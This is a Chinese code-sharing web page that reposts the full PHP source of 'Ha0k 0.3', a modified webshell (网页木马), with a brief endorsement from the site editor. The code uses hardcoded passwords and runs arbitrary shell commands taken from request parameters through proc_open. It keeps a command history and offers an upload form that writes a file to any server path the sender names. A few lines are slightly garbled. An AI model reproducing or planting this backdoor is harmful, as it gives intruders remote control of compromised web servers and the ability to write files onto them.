Ha0k 0.3 PHP 网页木马修改版

前端之家收集整理的这篇文章主要介绍了Ha0k 0.3 PHP 网页木马修改版前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

<div class="codetitle"><a style="CURSOR: pointer" data="65678" class="copybut" id="copybut65678" onclick="doCopy('code65678')"> 代码如下:

<div class="codebody" id="code65678">
<?PHP
//此处可设置多个用户
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/ 此处设置命令的别名 /
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/ 开始session /
session_start();
/ 初始化session. /
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd(); //取当前目录
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0表关闭,1表开启,开启时过滤
/ We don't want to add the commands to the history in the
escaped form,so we remove the backslashes now. /
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //将用addslashes()函数处理后的字符串返回原样
}
/
history /
if (($i = array_search($_REQUEST['command'],$_SESSION['history'])) !== false) //查找保存数组中的值
unset($_SESSION['history'][$i]); //销毁
array_unshift($_SESSION['history'],$_REQUEST['command']);//array_unshift()函数的作用是在一个数组中插入新的元素。而这个新的数组将被添加到原数组的开头部分。函数最终返回的是插入新元素后的数组。
/
输出Ha0k# command /
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "\n";
/
Initialize the current working directory. /
if (ereg('^[[:blank:]]
cd[[:blank:]]$',$_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(FILE); //获取当前所在目录
} elseif (ereg('^[[:blank:]]
cd[[:blank:]]+([^;]+)$',$_REQUEST['command'],$regs)) {
/ The current command is a 'cd' command which we have to handle
as an internal shell command. /
if ($regs[1][0] == '/') {
/
Absolute path,we use it unchanged. /
$new_dir = $regs[1];
} else {
/
Relative path,we append it to the current working
directory. /
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/ Transform '/./' into '/' /
while (strpos($new_dir,'/./') !== false)
$new_dir = str_replace('/./','/',$new_dir);
/ Transform '//' into '/' /
while (strpos($new_dir,'//') !== false)
$new_dir = str_replace('//',$new_dir);
/ Transform 'x/..' into '' /
while (preg_match('|/..(?!.)|',$new_dir))
$new_dir = preg_replace('|/?[^/]+/..(?!.)|','',$new_dir);
if ($new_dir == '') $new_dir = '/';
/ Try to change directory. /
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
/ The command is not a 'cd' command,so we execute it after
changing the directory and save the output. /
chdir($_SESSION['cwd']); //改变目录
/
别名扩展 /
$length = strcspn($_REQUEST['command']," \t"); //查找\t字符串,返回位置
$token = substr($_REQUEST['command'],$length); //取字符串0-\t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'],$length);
$p = proc_open($_REQUEST['command'],//执行脚本
array(1 => array('pipe','w'),
2 => array('pipe','w')),
$io);
/
读出发送 /
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),//转换特殊字符为HTML字符编码
ENT_COMPAT,'GB2312');
}
/
读出 /
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT,'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/
构建在JavaScript使用命令历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes',$_SESSION['history']);
$js_command_hist = '"","' . implode('","',$escaped) . '"';//将数组搞成字符串
}
}
header('Content-Type: text/html; charset=GB2312');
echo '<?xml version="1.0" encoding="GB2312"?>' . "\n";
?>
<?PHP
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'],$_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name'];
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

Ha0k webshell
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[currentline];
}
}
function init() {
document.shell.setAttribute("autocomplete","off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}

<style type="text/css">



<body onload="init()">
<BODY BGCOLOR="#$$$$$$">
<BODY TEXT="1afa3a">
@H
502_175@<a href="http://hi.baidu.com/hackerdsb" class="STYLE1">HA0K
WE JUST FOR JUSTICE,FIGHT FOR EVIAL

<?php if (!$authenticated) { ?>

You failed to authenticate yourself to PhpShell. You can <a
href="<?php echo $_SERVER['PHP_SELF'] ?>">reload to try again.


Try reading the <a href="INSTALL">INSTALL file if you're having
problems with installing PhpShell.




<?php //
exit;
}
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>

当前目录为: <?php echo $_SESSION['cwd'] ?>


<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">

<textarea name="output" readonly="readonly" cols="80" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'],"\n");
$padding = str_repeat("\n",max(0,$_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
<


<p class="prompt">
$<input class="prompt" name="command" type="text"
onkeyup="key(event)" size="78" tabindex="1">





行数:



<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">

本地文件名: <input name="userfile" type="file">

远程文件名: <input name="remotefile" type="text">
<input type="submit" value="发送">




Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本 全世界最小的php网页木马一枚 附PHP木马的防范方法

猜你在找的PHP相关文章